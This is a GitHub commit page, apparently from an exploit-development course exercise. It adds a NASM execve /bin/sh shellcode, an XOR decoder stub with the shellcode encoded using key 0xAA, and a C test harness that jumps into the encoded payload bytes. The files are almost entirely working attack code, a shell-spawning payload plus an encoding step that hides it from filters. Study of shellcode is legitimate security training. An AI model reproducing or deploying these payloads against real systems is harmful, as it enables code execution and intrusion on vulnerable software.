Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Sign up
Appearance settings

Commit f1801a4

Browse files
Add files via upload
1 parent 2829157 commit f1801a4

File tree

8 files changed

+89
-0
lines changed

8 files changed

+89
-0
lines changed
536 Bytes
Binary file not shown.
Lines changed: 39 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,39 @@
1+
; Execve-stack.nasm
2+
; Author: Kunal Varudkar
3+
4+
; Purpose: Developing /bin/sh shellcode using stack
5+
6+
7+
global _start
8+
9+
section .text
10+
11+
_start:
12+
13+
14+
; push Null dword on the stack
15+
xoreax,eax
16+
pusheax
17+
18+
; push //bin/sh in reverse order to stack (strlen=even)
19+
push0x68732f6e
20+
push0x69622f2f
21+
22+
; Moving //bin/sh to ebx register
23+
movebx,esp
24+
25+
; push Null on stack
26+
pusheax
27+
28+
; pointing esp to edx (envp[]=NULL)
29+
movedx,esp
30+
31+
; push the address of //bin/sh stored in ebx
32+
pushebx
33+
34+
; point the top tof the stack to ECX[argv[]]
35+
movecx,esp
36+
37+
; call syscall
38+
moval,0xb ; or 11
39+
int0x80
464 Bytes
Binary file not shown.
656 Bytes
Binary file not shown.
Lines changed: 34 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,34 @@
1+
; XOR-Decoder.nasm
2+
; Author: Kunal Varudkar
3+
4+
; Purpose: Developing xor Decoder
5+
6+
7+
global _start
8+
9+
section .text
10+
11+
_start:
12+
13+
jmp short call_decoder ;JMP-CALL-POP technique
14+
15+
16+
decoder:
17+
18+
popesi ; get the memory address of shellcode in esi
19+
xorecx,ecx ; xor op to avoid bad character
20+
movcl,25 ; using ecx reg to use loop( length of shellcode=25)
21+
22+
decode:
23+
; XOR-decoding
24+
xor byte [esi],0xAA ; xor each byte with 0xAA
25+
incesi ; Increment esi for next bytearray
26+
loop decode ; loop until ecx is zero
27+
28+
jmp short shellcode ; ecx=0 goto shellcode(indicate decoding is done)
29+
30+
call_decoder:
31+
32+
call decoder
33+
; encoded shellcode
34+
shellcode: db 0x9b,0x6a,0xfa,0xc2,0xc4,0x85,0xd9,0xc2,0xc2,0x85,0x85,0xc8,0xc3,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a
592 Bytes
Binary file not shown.
7.32 KB
Binary file not shown.
Lines changed: 16 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,16 @@
1+
#include<stdio.h>
2+
#include<string.h>
3+
4+
unsigned char code[] = \
5+
"\xeb\x0d\x5e\x31\xc9\xb1\x19\x80\x36\xaa\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff\x9b\x6a\xfa\xc2\xc4\x85\xd9\xc2\xc2\x85\x85\xc8\xc3\x23\x49\xfa\x23\x48\xf9\x23\x4b\x1a\xa1\x67\x2a";
6+
7+
8+
main()
9+
{
10+
11+
printf("Shellcode Length= %d\n", strlen(code));
12+
int (*ret)() = ( int (*)())code;
13+
14+
ret();
15+
16+
}

0 commit comments

Comments
(0)

AltStyle によって変換されたページ (->オリジナル) /